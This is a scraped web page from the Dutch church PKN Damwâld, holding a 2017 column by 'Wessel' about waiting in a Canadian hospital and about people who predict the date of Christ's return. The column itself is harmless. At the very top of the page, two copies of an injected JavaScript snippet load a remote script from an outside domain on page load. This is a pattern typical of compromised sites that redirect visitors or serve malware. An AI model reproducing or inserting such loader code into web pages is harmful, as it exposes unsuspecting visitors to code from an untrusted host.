;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wachten - PKN Damwâld

Wachten

Gepubliceerd op: donderdag 2 februari 2017

Bij dokters of in ziekenhuizen wordt regelmatig verzucht dat lang moet worden gewacht. Veel mensen kunnen daarover meepraten. Soms terecht, ook wel eens wat overdreven.
Bij een bezoek aan de spoedafdeling in een ziekenhuis in Canada moest ik ook eens lang WACHTEN;  Ik schrijf dit met opzet met hoofdletters, want alles is in Canada groter dan bij ons !
Maar dit WACHTEN had ook een groot voordeel. Wanneer je daar zit of ligt kun je je gedachten vrij laten gaan. Zo dacht ik eraan dat heel veel mensen tegenwoordig voorspellen dat de Here Jezus spoedig zal terugkeren op deze aarde. Hij heeft dit immers zelf gezegd ! Veel mensen lijken niet te kunnen wachten tot Hij terugkomt. Bijna wekelijks wordt wel voorspeld dat Hij op die en die datum zal terugkeren. Soms denk je dat de mensen het nauwkeuriger weten dan Jezus, want zoals Hij zelf aangeeft weet Hij het tijdstip van de wederkomst niet, alleen de Vader weet die.
Natuurlijk denken Christenen regelmatig aan de wederkomst van Christus en menselijk bekeken zijn er veel aanwijzingen dat dit spoedig zal zijn, al is daarbij wel de vraag wat onder ‘spoedig’ moet worden verstaan. Maar is dit wachten op de Here Jezus hetzelfde als verwachten, of is het eigenlijk meer een soort uitdaging van degene die de wederkomst ‘voorspelt’. Een uitdaging aan zichzelf dat hij of zij het toch maar even goed heeft voorspeld. Alsof gelijk krijgen belangrijker is dan de wederkomst van Christus.
Maar is het wel verstandig zo bezig te zijn met de wederkomst, zo dat je later (menselijk gesproken dan) kunt zeggen dat je het toch maar mooi vooraf had voorspeld ?Moet echter de vraag of wij voorbereid zijn op Jezus’ wederkomst ons niet veel meer bezig houden ?
Het lied ‘Bouw op God en wacht Zijn zegen’ eindigt met de vraag: ‘Bent U op die toekomst voorbereid?’ Voorbereid zijn op deze toekomst is beter dan het tijdstip juist menen te kunnen voorspellen.

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns